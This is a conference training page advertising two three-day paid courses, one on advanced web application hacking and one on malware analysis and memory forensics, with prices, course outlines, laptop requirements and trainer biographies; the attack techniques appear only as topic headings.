Trainings

Back to top

This year we'll have trainings in the days leading up to the Conference!

Please note that trainings are a separate event from the main conference, rooms will be at ISCTE-IUL, and run from the 25th to 27th November

Available Trainings

Training Early Bird Price (before 7 Oct) Regular Price
Advanced Web Hacking (3 Days) With NotSoSecure €1499+VAT €1799+VAT Registrations Closed
A Practical Approach To Malware Analysis And Memory Forensics (3 Days) by Monnappa €1499+VAT €1799+VAT Registrations Closed
Notes:
  • All registrations and payments will be handled by the training companies themselves;
  • Lunch is included all days;
  • Trainees will also receive a ticket to access the conference.

Advanced Web Hacking (3 Days) With NotSoSecure

Action packed web hacking class exploiting modern web application vulnerabilities such as SSRF, Template Injection, 2nd Order SQLi, Deserialization, Crypto flaws and more. Attacking authentication schemes such as JWT, SAML, OAuth. Learning esoteric Out-of-Band techniques and attack chaining.

Overview

This class teaches audience a wealth of hacking techniques to compromise modern day web applications, APIs and associated end-points. This class focus on specific areas of appsec and on advanced vulnerability identification and exploitation techniques (especially server side flaws). The class allows attendees to learn and practice some neat, new and ridiculous hacks which affected real life products and have found a mention in real bug-bounty programs. The vulnerabilities selected for the class either typically go undetected by modern scanners or the exploitation techniques are not so well known. Attendees will also benefit from a state-of-art Hacklab where they can practice the challenges.

Course Outline

  • Lab Setup and architecture overview
  • Burp Basics and Advanced Features
  • Attacking Authentication and SSO
    • Token Hijacking attacks
    • Logical Bypass / Boundary Conditions
    • Bypassing 2 Factor Authentication
    • Authentication Bypass using Subdomain Takeover
    • JWT Token Brute-Force attacks
    • SAML Authorization Bypass
    • OAuth Issues
  • Password Reset Attacks
    • Cookie Swap
    • Host Header Validation Bypass
    • Case study of popular password reset fails.
    • Business Logic Flaws / Authorization flaws
    • Mass Assignment
    • Invite/Promo Code Bypass
    • Replay Attack
    • API Authorisation Bypass
    • HTTP Parameter Pollution (HPP)
  • XML External Entity (XXE) Attack
    • XXE Basics
    • Advanced XXE Exploitation over OOB channels
    • XXE through SAML
    • XXE in File Parsing
  • Breaking Crypto
    • Known Plaintext Attack (Faulty Password Reset)
    • Padding Oracle Attack
    • Hash length extension attacks
    • Auth bypass using .NET Machine Key
  • Code Execution (RCE)
    • Java Serialisation Attack
    • .Net Serialisation Attack
    • Node.js Serialization Attack
    • PHP Serialization Attack
    • JSON Serialization Attack
    • Server Side Template Injection
  • SQL Injection Masterclass
    • 2nd order injection
    • Out-of-Band exploitation
    • SQLi through crypto
    • OS code exec via powershell.
    • Advanced topics in SQli
    • Advanced SQLMap Usage
    • Exploiting code injection over OOB channel
  • Tricky File Upload
    • Malicious File Extensions
    • Circumventing File validation checks
    • Exploiting hardened web servers.
  • Server Side Request Forgery (SSRF)
    • SSRF to query internal network
    • SSRF to call internal files
    • Various Case studies
  • Attacking the Cloud
    • SSRF Exploitation
    • Serverless exploitation
    • Google Dorking in the Cloud Era
    • Various Case Studies
  • Attacking Hardened CMS
    • Identifying and attacking various CMS
  • Web Caching Attacks.
  • Attack Chaining N tier vulnerability Chaining leading to RCE.
  • Various Case Studies

Who should take this course

Developers, SOC analysts, entry level/intermediate level penetration testers, network engineers, security architects, security enthusiasts and anyone who wants to take their skills to next level

Student requirements

Students must bring their own laptop and have admin/root access on it. The laptop should have at least 4 GB RAM and 20 GB of free disk space and a working copy of the latest Kali Operating System. Kali OS should be run inside a Virtual machine (e.g. VMware Workstation/Fusion/Player or Virtual Box).

What students will be provided with

Access to a hacking lab not just during the course but for 15 days after the class too. This gives them plenty of time to practice the concepts taught in the class. Numerous scripts and tools will also be provided during the training, along with student handouts.

Check out the Advanced Web Hacking website at https://www.notsosecure.com/hacking-training/advanced-web-hacking/#overview

About the Trainer
Dhruv Shah is an information security professional working as a Principal Security Consultant at NotSoSecure. He has over 7+ years of experience in application, mobile and network security. He has co-authored the book 'Kali Linux Intrusion and Exploitation' by Packtpub. His work can be found on security-geek.in. He is also a trainer of NotSoSecure's much acclaimed advanced web hacking class and has been a trainer at several leading public conferences such as Black Hat USA and Europe. He has provided security training to various clients in UK, EU and USA via corporate training

A Practical Approach To Malware Analysis And Memory Forensics (3 Days) by Monnappa

This hands-on training teaches the concepts, tools, and techniques to analyze, investigate and hunt malwares by combining two powerful techniques malware analysis and memory forensics.This course will introduce attendees to basics of malware analysis, reverse engineering, Windows internals and memory forensics, it then gradually progresses deep into more advanced concepts of malware analysis & memory forensics. Attendees will learn to perform static, dynamic, code and memory analysis. This course consists of scenario-based hands-on labs after each module which involves analyzing real-world malware samples and infected memory images (crimeware, APT malware, fileless malwares, Rootkits etc). This hands-on training is designed to help attendees gain a better understanding of the subject in short span. Throughout the course, the attendees will learn the latest techniques used by the adversaries to compromise and persist on the system. The training also demonstrates how to integrate the malware analysis and forensics techniques into a custom sandbox to automate the analysis of malicious code. After taking this course attendees will be better equipped with skills to analyze, investigate and respond to malware-related incidents.

The training provides practical guidance and attendees should walk away with the following skills:

  • How malware and Windows internals work
  • How to create a safe and isolated lab environment for malware analysis
  • What are the techniques and tools to perform malware analysis
  • How to perform static analysis to determine the metadata associated with malware
  • How to perform dynamic analysis of the malware to determine its interaction with process, file system, registry and network
  • How to perform code analysis to determine the malware functionality
  • How to debug a malware using tools like IDA Pro, Ollydbg/Immunity debugger/x64dbg
  • How to analyze downloaders, droppers, keyloggers, fileless malware, HTTP backdoors, etc.
  • What is Memory Forensics and its use in malware and digital investigation
  • Ability to acquire a memory image from suspect/infected systems
  • How to use open source advanced memory forensics framework (Volatility)
  • Understanding of the techniques used by the malwares to hide from Live forensic tools
  • Understanding of the techniques used by Rootkits(code injection, hooking, etc.)
  • Investigative steps for detecting stealth and advanced malware
  • How memory forensics helps in malware analysis and reverse engineering
  • How to incorporate malware analysis and memory forensics in sandbox
  • How to determine the network and host-based indicators (IOC)
  • Techniques to hunt malwares

COURSE CONTENTS

INTRODUCTION TO MALWARE ANALYSIS:

  • What is Malware
  • What they do
  • Why malware analysis
  • Types of malware analysis
  • Setting up an isolated lab environment

STATIC ANALYSIS:

  • Fingerprinting the malware
  • Extracting strings
  • Determining File obfuscation
  • Pattern matching using YARA
  • Fuzzing hashing & comparison
  • Understanding PE File characteristics
  • Disassembly
  • Hands-on lab exercise involves analyzing real malware sample

DYNAMIC ANALYSIS/BEHAVIOURAL ANALYSIS:

  • Dynamic Analysis Steps
  • Understanding Dynamic Analysis tools
  • Simulating services
  • Performing Dynamic Analysis
  • Monitoring process, filesystem, registry and network activity
  • Determining the Indicators of compromise (host and network indicators)
  • Demo – Showing the static & dynamic analysis of real malware sample
  • Hands-on lab exercise involves analyzing real malware sample

AUTOMATING MALWARE ANALYSIS(SANDBOX):

  • Custom Sandbox Overview
  • Working of Sandbox
  • Sandbox Features
  • Demo – Analyzing malware in the custom sandbox

CODE ANALYSIS:

  • Code Analysis Overview
  • Disassembler & Debuggers
  • Code Analysis Tools
  • Basics of IDA Pro
  • Basics of Ollydbg/x64dbg
  • Understanding the API calls
  • Reversing Malware functionalities(Downloader, dropper, keylogger, code injection, HTTP backdoor)
  • Hands-on lab exercise involves analyzing real malware sample

INTRODUCTION TO MEMORY FORENSICS:

  • What is Memory Forensics
  • Why Memory Forensics
  • Steps in Memory Forensics
  • Memory acquisition and tools
  • Acquiring memory From physical machine
  • Acquiring memory from the virtual machine
  • Hands-on exercise involves acquiring the memory

VOLATILITY OVERVIEW:

  • Introduction to Volatility Advanced Memory Forensics Framework
  • Volatility Installation
  • Volatility basic commands
  • Determining the profile
  • Volatility help options
  • Running the plugin

INVESTIGATING PROCESS:

  • Understanding Process Internals
  • Process(EPROCESS) Structure
  • Process organization
  • Process Enumeration by walking the double linked list
  • process relationship (parent-child relationship)
  • Understanding DKOM attacks
  • Process Enumeration using pool tag scanning
  • Volatility plugins to enumerate processes
  • Identifying malware process
  • Hands-on lab exercise(scenario based) involves investigating malware infected memory

INVESTIGATING PROCESS HANDLES & REGISTRY:

  • Objects and handles overview
  • Enumerating process handles using Volatility
  • Understanding Mutex
  • Detecting malware presence using mutex
  • Understanding the Registry
  • Investigating common registry keys using Volatility
  • Detecting malware persistence
  • Hands-on lab exercise(scenario based) involves investigating malware infected memory

INVESTIGATING NETWORK ACTIVITIES:

  • Understanding malware network activities
  • Volatility Network Plugins
  • Investigating Network connections
  • Investigating Sockets
  • Hands-on lab exercise(scenario based) involves investigating malware infected memory

INVESTIGATION PROCESS MEMORY:

  • Process memory Internals
  • Listing DLLs using Volatility
  • Identifying hidden DLLs
  • Dumping malicious executable from memory
  • Dumping Dll’s from memory
  • Scanning the memory for patterns(yarascan)
  • Hands-on lab exercise(scenario based) involves investigating malware infected memory

INVESTIGATING USER-MODE ROOTKITS & FILELESS MALWARES:

  • Code Injection
  • Types of Code injection
  • Remote DLL injection
  • Remote Code injection
  • Reflective DLL injection
  • Hollow process injection
  • Demo – Case Study
  • Hands-on lab exercise(scenario based) involves investigating malware infected memory

MEMORY FORENSICS IN SANDBOX TECHNOLOGY:

  • Sandbox Overview
  • Integrating Memory Forensics into a sandbox
  • Demo – showing the use of memory forensics in a custom sandbox

INVESTIGATING KERNEL-MODE ROOTKITS:

  • Understanding Rootkits
  • Understanding Functional call traversal in Windows
  • Level of Hooking/Modification on Windows
  • Kernel Volatility plugins
  • Hands-on lab exercise(scenario based) involves investigating malware infected memory
  • Demo – Rootkit Investigation

MEMORY FORENSIC CASE STUDIES:

  • Demo – Hunting an APT malware from Memory

REQUIREMENTS

Students should:

  • Be familiar with using Windows/Linux
  • Have an understanding of basic programming concepts, while programming experience is not mandatory.

SYSTEM REQUIREMENTS

  • Laptop with minimum 6GB RAM and 40GB free hard disk space
  • Laptop with USB ports. The lab samples and custom Linux VM will be shared via USB sticks
  • VMware Workstation or VMware Fusion (even trial versions can be used).
  • Windows Operating system (preferably Windows 7 64-bit, even Windows 8 and above versions are fine) installed inside the VMware Workstation/Fusion. You must have full administrator access for the Windows operating system installed inside the VMware Workstation/Fusion.

Note: VMware player or VirtualBox is not suitable for this training. The lab setup guide will be sent you after registration.

About the Trainer
Monnappa K A works for Cisco Systems as an information security investigator focusing on threat intelligence, investigation, and research of cyber espionage and advanced cyber attacks. He is the author of the best selling book “Learning Malware Analysis” and member of Black Hat review board. He is the creator of Limon Linux sandbox and winner of Volatility plugin contest 2016. He is the co-founder of the cybersecurity research community “Cysinfo” (https://www.cysinfo.com). His fields of interest include malware analysis, reverse engineering, memory forensics, and threat intelligence.

He has presented at various security conferences including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit and Cysinfo meetings on various topics which include memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has conducted training sessions at Black Hat, BruCON, OPCDE, FIRST (Forum of Incident Response and Security teams), SEC-T and 4SICS-SCADA/ICS cyber security summit. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community in his YouTube channel (http://www.youtube.com/c/MonnappaKA) and you can read his blog posts at https://cysinfo.com
Twitter: @monnappa22